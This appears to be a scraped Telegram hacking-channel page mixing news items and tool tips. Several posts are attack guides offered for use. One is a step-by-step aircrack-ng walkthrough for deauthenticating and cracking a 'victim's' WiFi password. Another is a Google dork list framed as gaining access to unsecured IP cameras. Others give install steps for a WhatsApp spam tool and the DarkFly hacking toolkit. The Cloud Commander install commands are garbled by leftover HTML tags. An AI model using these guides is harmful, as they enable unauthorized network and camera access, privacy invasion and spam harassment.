UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :

1️⃣Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :

airmon-ng

airmon-ng start wlan0

2️⃣ Now start the network detecting by typing this command :

airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.

3️⃣ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.

4️⃣Copy victim’s BSSID and also note the target channel CH number and type this command :

airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w

5️⃣There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon

6️⃣Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :

aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal

7️⃣now paste the password list in your cap folder and also go into the cap folder directory

Now crack with this command :

aircrack-ng -w pass.list 01.cap
8️⃣ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)

πŸ¦‘Tested On:
> root android
> version 6.0

Enjoy β€οΈπŸ‘πŸ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Netcat_vs_Cryptcat_–_Remote_Shell_to_Control_Kali_Linux_from_Windows.pdf
2.2 MB
Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:

1) Binary (DER) certificate

Contains an X.509 certificate in raw form using DER ASN.1 encoding.

2) ASCII (PEM) certificate (s)

Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.

3) Binary (DER) key

Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .

4) ASCII (PEM) key

Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).

5) PKCS # 7 Certificate

A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.

6) PKCS # 12 (PFX) key and certificate (s)

A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.

share usβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News

( if you a hater for tiktok call this tracking ennemiesπŸ‘Ί & and if you love tiktok call this a simple news)

> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.

>In a statement released today, TikTok’s director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.

πŸ¦‘In the statement:

> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.

> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.

>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the company’s main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.

>In the statement: β€œAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."

#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Vulnerability Scanners
#FastTips :


> Vulnerability scanners automate security auditing and can play a vital part in your IT security by scanning your network and websites for different security risks. These scanners are also capable of generating a prioritized list of those you should patch, and they also describe the vulnerabilities and provide steps on how to remediate them. It is also possible for some to even automate the patching process.

> One of the best lists of popular vulnerability scanners is maintained by OWASP at:

https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘maybee you have Toolx THE GREAT TOOL
Still need more ?
#tool

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

$ apt update

$ apt upgrade

$ apt install git

$ git clone https://github.com/Ranginang67/DarkFly-Tool

$ cd DarkFly-Tool

$ chmod +x

$ sh install

Run :

$ DarkFly


enjoyβ€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Gain access to unsecured IP cameras with these Google dorks.
βœ…2020 git source

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210β€³
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1β€³ intext:”Open Menu”
intext:”MOBOTIX M10β€³ intext:”Open Menu”
intext:”MOBOTIX D10β€³ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1β€³
intitle:”sony network camera snc-m1β€³
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”

enjoyβ€οΈπŸ‘πŸ»
βœ…2020 git source
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Whatsapp Spam via Termux :
> unimited messages- Spam Does Not Make You Hackers, Cyber, Cracker, Anonymous And Minions. Spamming Only For Good Purposes Does Not Violate Religious Law And Rules
#FastTips

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣$ pkg update upgrade

2️⃣$ pkg install git python2 toilet figlet php

3️⃣$ git clone https://github.com/4L13199/LITESPAM

4️⃣$ cd LITESPAM

use for learn
That's All !

enjoyβ€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
firewall bypss.pdf
1.2 MB
Firewall Bypass Most requested #Tutorial
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘What is Cloud Commander ?

Cloud Commander is a two-pane web file manager with a console and editor. It will help you manage the server and work with files, directories and programs in a browser on any computer, smartphone or tablet.

πŸ¦‘Benefits :

>Open source (MIT License).

>Two classic panels.

>Possibility of authorization.

>The client works in a web browser.

>The server runs on Windows, Linux, Mac OS and Android (using Termux).
It can be used locally or remotely.

>Adapts to Screen size.

>3 built-in editors with syntax highlighting support: Dword, Edward and Deepword.

>Console with support for the standard OS command line.

>Written in JavaScript / Node.js.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">curl -sL https://deb.nodesource.com/setup_6.x | </font><font style="vertical-align: inherit;">sudo -E bash -</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">

2️⃣-------- For version Node.js v7 --------</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">

3️⃣curl -sL https://deb.nodesource.com/setup_7.x | </font><font style="vertical-align: inherit;">sudo -E bash -</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">

4️⃣sudo apt-get install -y nodejs</font></font>

(html commandsπŸ™‚)

5️⃣After installing the nodejs and npm packages, let's move on to installing Cloud Commander with the following commands

> <font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo npm i cloudcmd -g</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">


> sudo npm i cloudcmd -g --force</font></font>

6️⃣to run :

<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cloudcmd</font></font>

7️⃣run as root :

<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo cloudcmd</font></font>

8️⃣Starting from the superuser will allow you to perform any operations and work with any files.

By default, the file manager is available in the browser at http: // localhost: 8000

enjoyβ€οΈπŸ‘πŸ»
written
by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
πŸ¦‘Now you got :

> Two classic panels.

>Possibility of authorization.

>The client works in a web browser.

>The server runs on Windows, Linux, Mac OS and Android (using Termux).
It can be used locally or remotely.

>Adapts to Screen size.

>3 built-in editors with syntax highlighting support: Dword, Edward and Deepword.

>Console with support for the standard OS command line.

>Written in JavaScript / Node.js.
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘Wi-Fi Hacking Software

> Full with Pictures & Methodes
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘1️⃣AIRMON-NG TUTORIAL

Switch to monitor mode
airmon-ng is a bash script designed to put wireless cards into surveillance (monitor) mode. It also has the option to close programs that interfere with monitor mode. Sometimes it may fail - in these cases it is recommended to use the β€œmanual” translation into monitor mode.
commands inside
2️⃣boop is a program from the BoopSuite package for putting a wireless card into monitor mode and in controlled mode.

> https://kali.tools/?p=3409

3️⃣Handshake capture

airodump-ng is a tool for capturing wireless packets. Very often used to capture four-stage handshakes, which are later used to crack a Wi-Fi network password. It can capture any frames of wireless networks for further analysis.

https://kali.tools/?p=411